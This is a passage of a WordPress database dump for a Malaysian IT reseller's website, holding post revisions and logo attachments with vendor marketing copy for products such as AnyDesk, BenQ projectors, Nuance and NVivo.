02:12:19','<h2>Anydesk</h2>\r\n<h2 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h2>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2018-12-12 10:12:19','2018-12-12 02:12:19','',1437,'https://bintara.com.my/blog/2018/12/12/1437-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (1909,1,'2018-12-12 14:57:45','2018-12-12 06:57:45','Wireless Router, Router, Wireless Access Point, Switch\n\n<!--more-->\n\n<img class=\"alignnone wp-image-1706 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ruckus-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','RUCKUS','','inherit','closed','closed','','1429-autosave-v1','','','2018-12-12 14:57:45','2018-12-12 06:57:45','',1429,'https://bintara.com.my/blog/2018/12/12/1429-autosave-v1/',0,'revision','',0),(1763,1,'2018-12-12 15:03:14','2018-12-12 07:03:14','Hard Disk Drive, Solid State Drive. Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1709\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Seagate-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','SEAGATE','','inherit','closed','closed','','1433-autosave-v1','','','2018-12-12 15:03:14','2018-12-12 07:03:14','',1433,'https://bintara.com.my/blog/2018/12/12/1433-autosave-v1/',0,'revision','',0),(1765,1,'2019-09-23 16:03:20','2019-09-23 08:03:20','Backup &amp; Replication. <a href=\"https://bintara.com.my/veeam/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1698\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-11x.png\" alt=\"\" width=\"1024\" height=\"681\" />','VEEAM','','inherit','closed','closed','','1492-autosave-v1','','','2019-09-23 16:03:20','2019-09-23 08:03:20','',1492,'https://bintara.com.my/blog/2018/12/12/1492-autosave-v1/',0,'revision','',0),(1766,1,'2018-12-12 10:20:35','2018-12-12 02:20:35','&nbsp;\n\n<!--more-->\n\n&nbsp;','VERITAS','','inherit','closed','closed','','1495-autosave-v1','','','2018-12-12 10:20:35','2018-12-12 02:20:35','',1495,'https://bintara.com.my/blog/2018/12/12/1495-autosave-v1/',0,'revision','',0),(1767,1,'2018-12-12 10:22:55','2018-12-12 02:22:55','Interactive pen displays, pen tablets, and styluses\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1714\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Wacom-logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','WACOM','','inherit','closed','closed','','1498-autosave-v1','','','2018-12-12 10:22:55','2018-12-12 02:22:55','',1498,'https://bintara.com.my/blog/2018/12/12/1498-autosave-v1/',0,'revision','',0),(1768,1,'2018-12-12 10:25:23','2018-12-12 02:25:23','Acronis Logo','Acronis Logo','Acronis Logo','inherit','closed','closed','','acronis-logo','','','2018-12-12 10:30:40','2018-12-12 02:30:40','',1324,'https://bintara.com.my/wp-content/uploads/2018/12/Acronis-Logo.png',0,'attachment','image/png',0),(1769,1,'2018-12-12 10:25:25','2018-12-12 02:25:25','Atlas.ti Logo','Atlas.ti Logo','Atlas.ti Logo','inherit','closed','closed','','atlas-ti-logo','','','2018-12-12 10:34:57','2018-12-12 02:34:57','',1342,'https://bintara.com.my/wp-content/uploads/2018/12/Atlas.ti-Logo.png',0,'attachment','image/png',0),(1770,1,'2018-12-12 10:25:26','2018-12-12 02:25:26','Belkin Logo','Belkin Logo','Belkin Logo','inherit','closed','closed','','belkin-logo','','','2018-12-12 10:36:18','2018-12-12 02:36:18','',1348,'https://bintara.com.my/wp-content/uploads/2018/12/Belkin-Logo.png',0,'attachment','image/png',0),(1771,1,'2018-12-12 10:25:28','2018-12-12 02:25:28','DELL EMC logo','DELL EMC logo','DELL EMC logo','inherit','closed','closed','','dell-emc-logo','','','2018-12-12 10:28:48','2018-12-12 02:28:48','',1370,'https://bintara.com.my/wp-content/uploads/2018/12/DELL-EMC-logo.png',0,'attachment','image/png',0),(1772,1,'2018-12-12 10:25:29','2018-12-12 02:25:29','Infocus Logo','Infocus Logo','Infocus Logo','inherit','closed','closed','','infocus-logo','','','2018-12-12 10:38:02','2018-12-12 02:38:02','',1390,'https://bintara.com.my/wp-content/uploads/2018/12/Infocus-Logo.png',0,'attachment','image/png',0),(1773,1,'2018-12-12 10:25:31','2018-12-12 02:25:31','Nvivo Logo','Nvivo Logo','Nvivo Logo','inherit','closed','closed','','nivivo-logo','','','2018-12-12 10:42:45','2018-12-12 02:42:45','',1415,'https://bintara.com.my/wp-content/uploads/2018/12/Nivivo-Logo.png',0,'attachment','image/png',0),(1774,1,'2018-12-12 10:25:32','2018-12-12 02:25:32','Nuance Logo','Nuance Logo','Nuance Logo','inherit','closed','closed','','nuance-logo','','','2018-12-12 10:41:28','2018-12-12 02:41:28','',1411,'https://bintara.com.my/wp-content/uploads/2018/12/Nuance-Logo.png',0,'attachment','image/png',0),(1775,1,'2018-12-12 10:25:34','2018-12-12 02:25:34','Peplink Logo','Peplink Logo','Peplink Logo','inherit','closed','closed','','peplink-logo','','','2018-12-12 10:44:18','2018-12-12 02:44:18','',1420,'https://bintara.com.my/wp-content/uploads/2018/12/Peplink-Logo.png',0,'attachment','image/png',0),(1776,1,'2018-12-12 10:25:35','2018-12-12 02:25:35','StorageCraft Logo','StorageCraft Logo','StorageCraft Logo','inherit','closed','closed','','storagecraft-logo','','','2018-12-12 10:45:53','2018-12-12 02:45:53','',1461,'https://bintara.com.my/wp-content/uploads/2018/12/StorageCraft-Logo.png',0,'attachment','image/png',0),(1777,1,'2018-12-12 10:25:36','2018-12-12 02:25:36','Synology Logo','Synology Logo','Synology Logo','inherit','closed','closed','','synology-logo','','','2018-12-12 10:47:10','2018-12-12 02:47:10','',1467,'https://bintara.com.my/wp-content/uploads/2018/12/Synology-Logo.png',0,'attachment','image/png',0),(1778,1,'2018-12-12 10:30:40','2018-12-12 02:30:40','Backup software, disaster recovery, and secure data access\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1768\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acronis-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ACRONIS','','inherit','closed','closed','','1324-autosave-v1','','','2018-12-12 10:30:40','2018-12-12 02:30:40','',1324,'https://bintara.com.my/blog/2018/12/12/1324-autosave-v1/',0,'revision','',0),(1779,1,'2018-12-12 10:38:45','2018-12-12 02:38:45','&nbsp;\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1772\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Infocus-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','INFOCUS','','inherit','closed','closed','','1390-autosave-v1','','','2018-12-12 10:38:45','2018-12-12 02:38:45','',1390,'https://bintara.com.my/blog/2018/12/12/1390-autosave-v1/',0,'revision','',0),(1781,1,'2018-12-12 10:42:57','2018-12-12 02:42:57','Qualitative data analysis computer software package\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1773\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Nivivo-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','NVIVO','','inherit','closed','closed','','1415-autosave-v1','','','2018-12-12 10:42:57','2018-12-12 02:42:57','',1415,'https://bintara.com.my/blog/2018/12/12/1415-autosave-v1/',0,'revision','',0),(1782,1,'2018-12-12 15:09:47','2018-12-12 07:09:47','Network Attached Storage (NAS). Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1777\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Synology-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','SYNOLOGY','','inherit','closed','closed','','1467-autosave-v1','','','2018-12-12 15:09:47','2018-12-12 07:09:47','',1467,'https://bintara.com.my/blog/2018/12/12/1467-autosave-v1/',0,'revision','',0),(1783,1,'2018-12-12 14:42:55','2018-12-12 06:42:55','Data Storage, Cloud Data Services, Data Infrastructure Management, Data Backup And Recovery, All Flash Storage and Hybrid Flash Storage. Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1701\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/NetApp-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','NETAPP','','inherit','closed','closed','','1408-autosave-v1','','','2018-12-12 14:42:55','2018-12-12 06:42:55','',1408,'https://bintara.com.my/blog/2018/12/12/1408-autosave-v1/',0,'revision','',0),(1784,1,'2018-12-12 10:59:25','2018-12-12 02:59:25','<h2>BenQ</h2>\r\n<h2><span style=\"text-decoration: underline;\">Projectors</span></h2>\r\n<h3>Business Projector ( Smart Design for Presentations )</h3>\r\n<h4 class=\"com_sub_title sub_title_md f_black text-center \">High Brightness for Well-Lit Rooms</h4>\r\n<div class=\"com_text text_lg f_black text-left\">\r\n\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<div class=\"com_text text_lg f_white text-left\">\r\n<div class=\"com_text text_lg f_white text-left\">\r\n<div class=\"com_text text_lg f_black text-left\">\r\n<div class=\"parbase section text\">\r\n<div class=\"padding-bottom-30\">\r\n<h3><span class=\"font-large\">Interactive Classroom Projectors</span></h3>\r\n</div>\r\n</div>\r\n<div class=\"parbase section text\">\r\n<div>\r\n<h4><b>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</b></h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n\r\n</div>\r\n</div>\r\n<div class=\"parbase section text\">\r\n<div>\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h2></h2>\r\n<h2 class=\"com_title title_md f_white text-center\"><span style=\"text-decoration: underline;\">Interactive Flat Panel</span></h2>\r\n</div>\r\n<h3 class=\"bd-font-3xl bd-center bd-full-w bd-mb-s\">Meeting Room &amp; Boardroom</h3>\r\n<p class=\"paragraph title-main-bottom\">Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p>\r\n\r\n<div class=\"row container-text\">\r\n<h3 class=\"title-paragraph\">4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3>\r\n<p class=\"title-paragraph\"><b>Work Collaboratively and Conduct Business Efficiently</b>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.</p>\r\n<p class=\"title-paragraph\">With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p>\r\n<p class=\"title-paragraph\">Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p>\r\n<p class=\"title-paragraph\">Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p>\r\n\r\n</div>\r\n<div class=\"row container-img\"></div>\r\n<div>\r\n<h3 class=\"title-sub\">How BenQ Display turns meeting rooms into places of efficiency</h3>\r\n<ul class=\"paragraph list\">\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2018-12-12 10:59:25','2018-12-12 02:59:25','',1447,'https://bintara.com.my/blog/2018/12/12/1447-revision-v1/',0,'revision','',0),(1785,1,'2018-12-12 11:03:34','2018-12-12 03:03:34','<h2>BenQ</h2>\r\n<h2><span style=\"text-decoration: underline;\">Projectors</span></h2>\r\n<h3>Business Projector ( Smart Design for Presentations )</h3>\r\n<h4 class=\"com_sub_title sub_title_md f_black text-center \">High Brightness for Well-Lit Rooms</h4>\r\n<div class=\"com_text text_lg f_black text-left\">\r\n\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<div class=\"com_text text_lg f_white text-left\">\r\n<div class=\"com_text text_lg f_white text-left\">\r\n<div class=\"com_text text_lg f_black text-left\">\r\n<div class=\"parbase section text\">\r\n<div class=\"padding-bottom-30\">\r\n<h3><span class=\"font-large\">Interactive Classroom Projectors</span></h3>\r\n</div>\r\n</div>\r\n<div class=\"parbase section text\">\r\n<div>\r\n<h4><b>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</b></h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n\r\n</div>\r\n</div>\r\n<div class=\"parbase section text\">\r\n<div>\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h2></h2>\r\n<h2 class=\"com_title title_md f_white text-center\"><span style=\"text-decoration: underline;\">Interactive Flat Panel</span></h2>\r\n</div>\r\n<h3 class=\"bd-font-3xl bd-center bd-full-w bd-mb-s\">Meeting Room &amp; Boardroom</h3>\r\n<p class=\"paragraph title-main-bottom\">Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p>\r\n\r\n<div class=\"row container-text\">\r\n<h3 class=\"title-paragraph\">4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3>\r\n<p class=\"title-paragraph\"><b>Work Collaboratively and Conduct Business Efficiently</b>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.</p>\r\n<p class=\"title-paragraph\">With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p>\r\n<p class=\"title-paragraph\">Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p>\r\n<p class=\"title-paragraph\">Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p>\r\n\r\n</div>\r\n<div class=\"row container-img\"></div>\r\n<div>\r\n<h3 class=\"title-sub\">How BenQ Display turns meeting rooms into places of efficiency</h3>\r\n<ul class=\"paragraph list\">\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2018-12-12 11:03:34','2018-12-12 03:03:34','',1447,'https://bintara.com.my/blog/2018/12/12/1447-revision-v1/',0,'revision','',0),(1787,1,'2018-12-12 11:16:34','2018-12-12 03:16:34','<h2>BenQ</h2>\r\n<h2><u>Projectors</u></h2>\r\n<h3>Business Projector (Smart Design for Presentations)</h3>\r\n<h4>High Brightness for Well-Lit Rooms</h4>\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<h3>Interactive Classroom Projectors</h3>\r\n<h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h2><u>Interactive Flat Panel</u></h2>\r\n<h3>Meeting Room &amp; Boardroom</h3>\r\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\r\n<h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3>\r\n<strong>Work Collaboratively and Conduct Business Efficiently</strong>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\r\n\r\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\r\n\r\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\r\n<h3>How BenQ Display turns meeting rooms into places of efficiency</h3>\r\n<ul>\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2018-12-12 11:16:34','2018-12-12 03:16:34','',1447,'https://bintara.com.my/blog/2018/12/12/1447-revision-v1/',0,'revision','',0),(1786,1,'2018-12-12 11:04:20','2018-12-12 03:04:20','<h2 style=\"text-align: left;\">BenQ</h2>\r\n<h2 style=\"text-align: left;\"><span style=\"text-decoration: underline;\">Projectors</span></h2>\r\n<h3 style=\"text-align: left;\">Business Projector ( Smart Design for Presentations )</h3>\r\n<h4 class=\"com_sub_title sub_title_md f_black text-center \" style=\"text-align: left;\">High Brightness for Well-Lit Rooms</h4>\r\n<div class=\"com_text text_lg f_black text-left\">\r\n<p style=\"text-align: left;\">Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p>\r\n\r\n<div class=\"com_text text_lg f_white text-left\">\r\n<div class=\"com_text text_lg f_white text-left\">\r\n<div class=\"com_text text_lg f_black text-left\">\r\n<div class=\"parbase section text\" style=\"text-align: left;\">\r\n<div class=\"padding-bottom-30\">\r\n<h3><span class=\"font-large\">Interactive Classroom Projectors</span></h3>\r\n</div>\r\n</div>\r\n<div class=\"parbase section text\" style=\"text-align: left;\">\r\n<div>\r\n<h4><b>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</b></h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n\r\n</div>\r\n</div>\r\n<div class=\"parbase section text\">\r\n<div style=\"text-align: left;\">\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h2></h2>\r\n<h2 class=\"com_title title_md f_white text-center\" style=\"text-align: left;\"><span style=\"text-decoration: underline;\">Interactive Flat Panel</span></h2>\r\n</div>\r\n<h3 class=\"bd-font-3xl bd-center bd-full-w bd-mb-s\" style=\"text-align: left;\">Meeting Room &amp; Boardroom</h3>\r\n<p class=\"paragraph title-main-bottom\" style=\"text-align: left;\">Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p>\r\n\r\n<div class=\"row container-text\" style=\"text-align: left;\">\r\n<h3 class=\"title-paragraph\">4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h3>\r\n<p class=\"title-paragraph\"><b>Work Collaboratively and Conduct Business Efficiently</b>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.</p>\r\n<p class=\"title-paragraph\">With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p>\r\n<p class=\"title-paragraph\">Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p>\r\n<p class=\"title-paragraph\">Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p>\r\n\r\n</div>\r\n<div class=\"row container-img\" style=\"text-align: left;\"></div>\r\n<div>\r\n<h3 class=\"title-sub\" style=\"text-align: left;\">How BenQ Display turns meeting rooms into places of efficiency</h3>\r\n<ul class=\"paragraph list\" style=\"text-align: left;\">\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n<p style=\"text-align: left;\">[maxbutton id=\"1\" ]</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2018-12-12 11:04:20','2018-12-12 03:04:20','',1447,'https://bintara.com.my/blog/2018/12/12/1447-revision-v1/',0,'revision','',0),(2123,1,'2018-12-14 09:28:16','2018-12-14 01:28:16','<h3>Nuance</h3>\r\n<h3>Print, capture &amp; PDF solutions</h3>\r\n<h3>Gain control of your documents</h3>\r\nNuance document imaging solutions keep your organization\'s most vital information private.\r\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\r\nPrint and scan securely with Nuance solutions.\r\n<h4>Industry compliance</h4>\r\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\r\n<h4>Seamless integration</h4>\r\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\r\n<h4>Workflow management</h4>\r\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\r\n\r\n<hr />\r\n\r\n<h3>A comprehensive portfolio for managing your documents</h3>\r\n<h4>Print management</h4>\r\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\r\n<h4>Document capture &amp; workflow</h4>\r\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\r\n<h4>Mobile Document Imaging</h4>\r\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\r\n<h4>PDF &amp; document conversion</h4>\r\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\r\n<h4>Cost recovery</h4>\r\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2018-12-14 09:28:16','2018-12-14 01:28:16','',1555,'https://bintara.com.my/blog/2018/12/14/1555-revision-v1/',0,'revision','',0),(2124,1,'2018-12-14 09:28:54','2018-12-14 01:28:54','<h3>NVivo</h3>\r\nNVivo is the most used qualitative and mixed-methods data analysis software tool by academics and professional researchers globally. NVivo is ideal for complex research projects, whether youâ€™re working solo or in a team. Enrich your understanding with NVivo.\r\n<h3>Store and organize</h3>\r\nStore and sort all your data in one platform, from quantifiable demographic information to qualitative open-ended questions and interviews.\r\n<h3>Categorize and analyze</h3>\r\nUse powerful tools to categorize and classify your data. Automatically sort sentiment, themes and attributes in seconds. Quickly exchange data with SPSS for further statistical analysis.\r\n<h3>Visualize and discover</h3>\r\nEasily cross tabulate mixed methods data and visualize the results to brainstorm and map ideas, explore connections between project items and discover new paths of investigation.\r\n\r\n<hr />\r\n\r\n<img class=\"alignnone wp-image-1925 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-getting-published_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research getting published</h4>\r\nFacilitating rigorous analysis that leads to research being published\r\n\r\n<img class=\"alignnone wp-image-1927 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PhD-research_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>PhD research</h4>\r\nHelping PhD students produce more robust research over relying on manual research methods\r\n\r\n<img class=\"alignnone wp-image-1928 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Not-for-profit-support_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Not-for-profit support</h4>\r\nIdentifying ways to increase the impact of not-for-profits in raising funds and awareness\r\n\r\n<img class=\"alignnone wp-image-1929 size-medium\" 